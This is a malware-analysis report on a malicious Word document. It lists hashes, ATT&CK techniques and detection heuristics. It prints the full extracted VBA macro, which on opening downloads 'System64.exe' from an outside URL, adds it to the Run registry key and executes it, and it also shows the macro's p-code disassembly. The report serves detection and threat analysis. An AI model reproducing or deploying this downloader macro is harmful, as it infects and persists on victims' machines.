Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 be88762d3647a02e…

MALICIOUS

Office (OLE)

76.0 KB Created: 2014-11-19 05:23:00 Authoring application: Microsoft Office Word First seen: 2015-01-15
MD5: 7965821ac0da8becf2aa687e57b41302 SHA-1: 94b9e43e20eea3ddfe373f09f79fe65567c5dfcc SHA-256: be88762d3647a02e85aaa61c8e78252f09dec7ae7b043dac60906ea428e06620
450 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1105 Ingress Tool Transfer T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document that uses a lure to trick the user into enabling macros. Upon enabling, the VBA macro downloads a second-stage executable named 'System64.exe' from the URL http://ge.tt/api/1/files/8e8kZt72/0/blob?download and saves it to the user's temporary directory. It then writes a registry key to ensure persistence via HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\System64.exe, allowing the downloaded executable to run on system startup.

Heuristics 12

  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell fPath
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set Reg = CreateObject("Wscript.shell")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    Set Reg = CreateObject("Wscript.shell")
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set Reg = CreateObject("Wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Reg = CreateObject("Wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro
    • http://ge.tt/api/1/files/8e8kZt72/0/blob?downloadReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5129 bytes
SHA-256: db554b2011f134e0409768778be9c8b82e2246570e9f1ddef5efdc6422570790
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function URLDownloadToCacheFile Lib "urlmon" Alias "URLDownloadToCacheFileA" (ByVal lpUnkcaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwBufLength As Long, ByVal dwReserved As Long, ByVal IBindStatusCallback As Long) As Long
 
 
Private Declare PtrSafe Function GetTempPath _
Lib "kernel32" Alias "GetTempPathA" _
(ByVal nBufferLength As Long, _
ByVal lpBuffer As String) As Long
 
Private Const MAX_PATH As Long = 260
 
Function DownloadFile(URL As String) As String
Dim szFileName As String
szFileName = Space$(300)
If URLDownloadToCacheFile(0, URL, szFileName, Len(szFileName), 0, 0) = 0 Then DownloadFile = Trim(szFileName)
End Function
 
Function TempPath() As String
    TempPath = String$(MAX_PATH, Chr$(0))
    GetTempPath MAX_PATH, TempPath
    TempPath = Replace(TempPath, Chr$(0), "")
End Function
 
Private Sub Document_Open()
 
DoWork
 
End Sub
 
 
 
 
 
Sub DoWork()
Dim tmp As String, fName As String, Pos As Long, fPath As String
tmp = DownloadFile("http://ge.tt/api/1/files/8e8kZt72/0/blob?download")
'tmp = DownloadFile(rc4decrypt("YMe & chr(34)& lp52wsnV4"DyQw0DKMNIE_uZmPuzUL5b0WoVZ2r3E7f & chr(34)& jG713r1IgISh3hZD1a", "System64.exe"))
 
fName = "System64.exe"
 
fPath = TempPath & fName
FileCopy tmp, fPath
 
Kill tmp
 
 
 
'STARTUP
 
Dim Reg As Object
 
Set Reg = CreateObject("Wscript.shell")
Reg.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & fName, fPath
 
Shell fPath
End
Exit Sub
 
End Sub


' Processing file: /opt/analyzer/scan_staging/9eae0019859f4b71893fb7fe1049759e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4350 bytes
' Line #0:
' 	FuncDefn (Private Declare PtrSafe Function dwBufLength Lib "kernel32" (ByVal dwReserved As Long, ByVal IBindStatusCallback As String, ByVal urlmon As String, ByVal GetTempPath As Long, ByVal nBufferLength As Long, ByVal lpBuffer As Long) As Long)
' Line #1:
' Line #2:
' Line #3:
' 	LineCont 0x000C 05 00 00 00 09 00 00 00 0F 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function MAX_PATH Lib "Space" (ByVal DownloadFile As Long, ByVal URL As String) As Long)
' Line #4:
' Line #5:
' 	Dim (Private Const) 
' 	LitDI2 0x0104 
' 	VarDefn Trim (As Long)
' Line #6:
' Line #7:
' 	FuncDefn (Function TempPath(Chr As String, id_FFFE As String) As String)
' Line #8:
' 	Dim 
' 	VarDefn urlmon (As String)
' Line #9:
' 	LitDI2 0x012C 
' 	ArgsLd Replace$ 0x0001 
' 	St urlmon 
' Line #10:
' 	LitDI2 0x0000 
' 	Ld Chr 
' 	Ld urlmon 
' 	Ld urlmon 
' 	FnLen 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsLd dwBufLength 0x0006 
' 	LitDI2 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld urlmon 
' 	ArgsLd Document_Open 0x0001 
' 	St TempPath 
' 	EndIf 
' Line #11:
' 	EndFunc 
' Line #12:
' Line #13:
' 	FuncDefn (Function DoWork(id_FFFE As String) As String)
' Line #14:
' 	Ld Trim 
' 	LitDI2 0x0000 
' 	ArgsLd tmp$ 0x0001 
' 	ArgsLd String$ 0x0002 
' 	St DoWork 
' Line #15:
' 	Ld Trim 
' 	Ld DoWork 
' 	ArgsCall MAX_PATH 0x0002 
' Line #16:
' 	Ld DoWork 
' 	LitDI2 0x0000 
' 	ArgsLd tmp$ 0x0001 
' 	LitStr 0x0000 ""
' 	ArgsLd fName 0x0003 
' 	St DoWork 
' Line #17:
' 	EndFunc 
' Line #18:
' Line #19:
' 	FuncDefn (Private Sub Pos())
' Line #20:
' Line #21:
' 	ArgsCall fPath 0x0000 
' Line #22:
' Line #23:
' 	EndSub 
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' 	FuncDefn (Sub fPath())
' Line #30:
' 	Dim 
' 	VarDefn FileCopy (As String)
' 	VarDefn Kill (As String)
' 	VarDefn Reg (As Long)
' 	VarDefn CreateObject (As String)
' Line #31:
' 	LitStr 0x0031 "http://ge.tt/api/1/files/8e8kZt72/0/blob?download"
' 	ArgsLd TempPath 0x0001 
' 	St FileCopy 
' Line #32:
' 	QuoteRem 0x0000 0x008A "tmp = DownloadFile(rc4decrypt("YMe & chr(34)& lp52wsnV4"DyQw0DKMNIE_uZmPuzUL5b0WoVZ2r3E7f & chr(34)& jG713r1IgISh3hZD1a", "System64.exe"))"
' Line #33:
' Line #34:
' 	LitStr 0x000C "System64.exe"
' 	St Kill 
' Line #35:
' Line #36:
' 	Ld DoWork 
' 	Ld Kill 
' 	Concat 
' 	St CreateObject 
' Line #37:
' 	Ld FileCopy 
' 	Ld CreateObject 
' 	ArgsCall RegWrite 0x0002 
' Line #38:
' Line #39:
' 	Ld FileCopy 
' 	ArgsCall Shell 0x0001 
' Line #40:
' Line #41:
' Line #42:
' Line #43:
' 	QuoteRem 0x0000 0x0007 "STARTUP"
' Line #44:
' Line #45:
' 	Dim 
' 	VarDefn Document (As Object)
' Line #46:
' Line #47:
' 	SetStmt 
' 	LitStr 0x000D "Wscript.shell"
' 	ArgsLd id_025E 0x0001 
' 	Set Document 
' Line #48:
' 	LitStr 0x0040 "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\"
' 	Ld Kill 
' 	Concat 
' 	Ld CreateObject 
' 	Ld Document 
' 	ArgsMemCall id_0260 0x0002 
' Line #49:
' Line #50:
' 	Ld CreateObject 
' 	ArgsCall id_0262 0x0001 
' Line #51:
' 	End 
' Line #52:
' 	ExitSub 
' Line #53:
' Line #54:
' 	EndSub 
' Line #55:

Open this report in the interactive analyzer, or submit your own file for analysis.